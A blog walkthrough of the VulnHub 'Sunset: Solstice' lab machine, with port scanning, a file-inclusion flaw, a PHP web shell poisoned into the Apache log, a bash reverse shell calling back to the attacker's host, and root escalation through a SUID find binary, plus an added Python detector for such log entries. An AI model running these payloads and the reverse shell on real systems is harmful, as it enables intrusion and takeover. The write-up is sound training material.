PJzhang: vulnhub target machine, sunset series, SUNSET: SOLSTICE

Morning~~~

 

Link: https://www.vulnhub.com/entry/sunset-solstice,499/

The focus is on the tools and the approach.

nmap 192.168.43.0/24

Target machine IP: 192.168.43.127

nmap -A -p1-65535 192.168.43.127

21/tcp open ftp
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
25/tcp open smtp Exim smtpd 4.92
80/tcp open http Apache httpd 2.4.38 ((Debian))
139/tcp open netbios-ssn netbios-ssn Samba smbd 3.X - 4.X
445/tcp open microsoft-ds netbios-ssn Samba smbd 4.9.5-Debian
2121/tcp open ccproxy-ftp pyftpdlib 1.5.6
3128/tcp open squid-http Squid http proxy 4.6
8593/tcp open http PHP cli server 5.5 or later (PHP 7.3.14-1)
54787/tcp open http PHP cli server 5.5 or later (PHP 7.3.14-1)
62524/tcp open ftp FreeFloat ftpd 1.00

http://192.168.43.127/
http://192.168.43.127:3128/
http://192.168.43.127:8593/
http://192.168.43.127:54787/

dirb http://192.168.43.127/
nikto -h http://192.168.43.127/

Found a file inclusion vulnerability
http://192.168.43.127:8593/index.php?book=../../../../../../etc/passwd

http://192.168.43.127:8593/index.php?book=../../../../../../var/log/apache2/access.log

nc 192.168.43.127 80, press Enter, then type GET /<?php system($_GET['cmd']); ?> HTTP/1.1
or GET /<?php passthru($_GET['cmd']); ?> HTTP/1.1

bash -c 'bash -i >& /dev/tcp/192.168.43.154/4444 0>&1'

http://192.168.43.127:8593/index.php?book=../../../../../../var/log/apache2/access.log&cmd=bash -c 'bash -i >& /dev/tcp/192.168.43.154/4444 0>&1'

On the attacking machine: nc -lvnp 4444

Got a shell
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@solstice:/var/tmp/webserver$
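
Seen from the defending side, both the PHP tag written into access.log and the book= traversal requests are visible in web server logs. The detector below is an added example, not part of the original post: it flags both patterns in Apache combined-format lines. Assumptions: the names classify/scan, the rule set and the sample lines are constructed here, and the requests to the port 8593 server are assumed to be available in the same log format.

```python
import re
from urllib.parse import unquote

# Apache common/combined log format: host ident user [time] "request" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(.*?)" (\d{3}) ')
PHP_TAG = re.compile(r'<\?(?:php|=)', re.I)          # code written into a log line
TRAVERSAL = re.compile(r'(?:\.\./){2,}|\.\.\\')      # repeated ../ or ..\
SENSITIVE = re.compile(r'/etc/passwd|/var/log/|/proc/self/', re.I)

# Constructed sample lines (not taken from the target machine).
SAMPLE = [
    '192.168.43.154 - - [10/Sep/2020:05:58:01 +0000] "GET /<?php system($_GET[\'cmd\']); ?> HTTP/1.1" 400 0 "-" "-"',
    '192.168.43.154 - - [10/Sep/2020:05:59:10 +0000] "GET /index.php?book=../../../../../../etc/passwd HTTP/1.1" 200 1520 "-" "-"',
    '192.168.43.154 - - [10/Sep/2020:06:00:02 +0000] "GET /index.php?book=%2e%2e%2f%2e%2e%2fvar%2flog%2fapache2%2faccess.log HTTP/1.1" 200 88 "-" "-"',
    '192.168.43.20 - - [10/Sep/2020:06:01:00 +0000] "GET /index.php?book=dune HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

def decode(s, rounds=3):
    """Undo nested URL-encoding (%252e -> %2e -> .), bounded to a few rounds."""
    for _ in range(rounds):
        nxt = unquote(s)
        if nxt == s:
            break
        s = nxt
    return s

def classify(line):
    """Return (client, request, findings) for one log line, or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, request = m.group(1), m.group(2)
    decoded = decode(request)
    rules = (("php-tag-in-request", PHP_TAG),
             ("path-traversal", TRAVERSAL),
             ("sensitive-file-reference", SENSITIVE))
    findings = sorted(name for name, rx in rules if rx.search(decoded))
    return client, request, findings

def scan(lines):
    """Keep only the parsed lines that triggered at least one rule."""
    return [r for r in map(classify, lines) if r and r[2]]

if __name__ == "__main__":
    for client, request, findings in scan(SAMPLE):
        print(client, findings, request)
```
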

ps aux | grep root

root 427 0.0 2.0 196744 21184 ? S 05:55 0:00 /usr/bin/php -S 127.0.0.1:57 -t /var/tmp/sv/

cd /var/tmp/sv/

printf "<?php\nsystem('chmod o+x /usr/bin/find; chmod +s /usr/bin/find');\n?>" >index.php

curl 127.0.0.1:57/index.php

find . -exec /bin/sh -p \; -quit

whoami
shows root
id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)

 

posted @ 2020-09-10 23:05  PJzhang